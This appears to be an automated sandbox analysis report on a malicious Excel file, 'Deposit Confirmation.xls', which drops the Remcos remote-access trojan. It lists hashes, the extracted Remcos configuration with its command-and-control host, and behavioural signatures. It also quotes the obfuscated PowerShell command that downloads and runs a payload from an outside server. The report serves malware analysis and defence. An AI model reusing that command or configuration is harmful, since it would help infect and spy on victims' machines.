Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
14-10-2021 15:14
Static task
static1
Behavioral task
behavioral1
Sample
Deposit Confirmation.xls
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Deposit Confirmation.xls
Resource
win10-en-20210920
General
-
Target
Deposit Confirmation.xls
-
Size
74KB
-
MD5
7a149796e5ba1764a214148af241d33c
-
SHA1
a3b9d39fafbb8eba99ef7d313b2963078a95a80c
-
SHA256
7bdc1c4d7eb4471e5dcf71713b266066df99928f7be8732bfb36fe153f0f5e80
-
SHA512
35657865ddc2835915073e0bba5e5bbc9e42af6f08afbab6d6572d9c3c90dbd880ff21a51ccfe37c4baed1a8b8005354aafe8fc0baa597d3a8ad812c742ceea9
Malware Config
Extracted
http://greenpayindia.com/wp-conternt/ConsoleApp18.exe
Extracted
remcos
3.3.0 Pro
RemoteHost
lplazadtemins.duckdns.org:443
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Remcos-NLSDTO
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4052 2072 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
brotherneed.exepid process 2984 brotherneed.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
brotherneed.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\notepad = "\"C:\\Users\\Admin\\AppData\\Local\\notepad.exe\"" brotherneed.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
brotherneed.exedescription pid process target process PID 1468 set thread context of 2984 1468 brotherneed.exe brotherneed.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2072 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exebrotherneed.exepid process 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe 1468 brotherneed.exe 1468 brotherneed.exe 1468 brotherneed.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
brotherneed.exepid process 2984 brotherneed.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exebrotherneed.exedescription pid process Token: SeDebugPrivilege 4032 powershell.exe Token: SeDebugPrivilege 1468 brotherneed.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXEbrotherneed.exepid process 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2072 EXCEL.EXE 2984 brotherneed.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exebrotherneed.exedescription pid process target process PID 2072 wrote to memory of 4052 2072 EXCEL.EXE cmd.exe PID 2072 wrote to memory of 4052 2072 EXCEL.EXE cmd.exe PID 4052 wrote to memory of 4032 4052 cmd.exe powershell.exe PID 4052 wrote to memory of 4032 4052 cmd.exe powershell.exe PID 4032 wrote to memory of 1468 4032 powershell.exe brotherneed.exe PID 4032 wrote to memory of 1468 4032 powershell.exe brotherneed.exe PID 4032 wrote to memory of 1468 4032 powershell.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe PID 1468 wrote to memory of 2984 1468 brotherneed.exe brotherneed.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Deposit Confirmation.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\travelespecially.cmd" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\brotherneed.exe"C:\Users\Public\Documents\brotherneed.exe"4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\brotherneed.exeC:\Users\Admin\AppData\Local\Temp\brotherneed.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\brotherneed.exeMD5
aade455507f667318c83c42a95b3fc3c
SHA192efbfe4546ddee6a5807a5794adea2f440cf107
SHA256b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a
SHA512f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd
-
C:\Users\Admin\AppData\Local\Temp\brotherneed.exeMD5
aade455507f667318c83c42a95b3fc3c
SHA192efbfe4546ddee6a5807a5794adea2f440cf107
SHA256b774d45c6788cc48716eee3e81002e5b74996a3c2610967f3d19115646ca4d6a
SHA512f3a719f289a06b7bda717c56ddc4319bcd9c5f82eebe815f6923635f630f2940efa5cf8298d94117e0ef2470225deecaf3641e96b63cf47b3767a6aa5a772ffd
-
C:\Users\Public\Documents\travelespecially.cmdMD5
5ea928ce876726d313001f5cbd14bc65
SHA1b259839789c490d08af262d9217eddf2bfa93060
SHA2566c6f74c6249e442097918f128fa0680d53504fabf1f31198ed9c4d5de3364e0f
SHA512f8bceb21b86176edd8a917b000edcf2c6458e175c75ca546933caada1b6f436dd1e0a269c0989b45da5a9b48821bd97bb5db86b122e922fc8ae551b860cd2421
-
memory/1468-412-0x0000000004F00000-0x0000000004F01000-memory.dmpFilesize
4KB
-
memory/1468-407-0x0000000000000000-mapping.dmp
-
memory/2072-119-0x0000026912D90000-0x0000026912D92000-memory.dmpFilesize
8KB
-
memory/2072-118-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmpFilesize
64KB
-
memory/2072-122-0x0000026912D90000-0x0000026912D92000-memory.dmpFilesize
8KB
-
memory/2072-116-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmpFilesize
64KB
-
memory/2072-115-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmpFilesize
64KB
-
memory/2072-117-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmpFilesize
64KB
-
memory/2072-121-0x00007FFB8C970000-0x00007FFB8C980000-memory.dmpFilesize
64KB
-
memory/2072-120-0x0000026912D90000-0x0000026912D92000-memory.dmpFilesize
8KB
-
memory/2984-442-0x000000000042FC39-mapping.dmp
-
memory/2984-446-0x0000000000400000-0x0000000000479000-memory.dmpFilesize
484KB
-
memory/4032-406-0x00000252EA646000-0x00000252EA648000-memory.dmpFilesize
8KB
-
memory/4032-279-0x00000252EA643000-0x00000252EA645000-memory.dmpFilesize
8KB
-
memory/4032-278-0x00000252EA640000-0x00000252EA642000-memory.dmpFilesize
8KB
-
memory/4032-268-0x0000000000000000-mapping.dmp
-
memory/4052-265-0x0000000000000000-mapping.dmp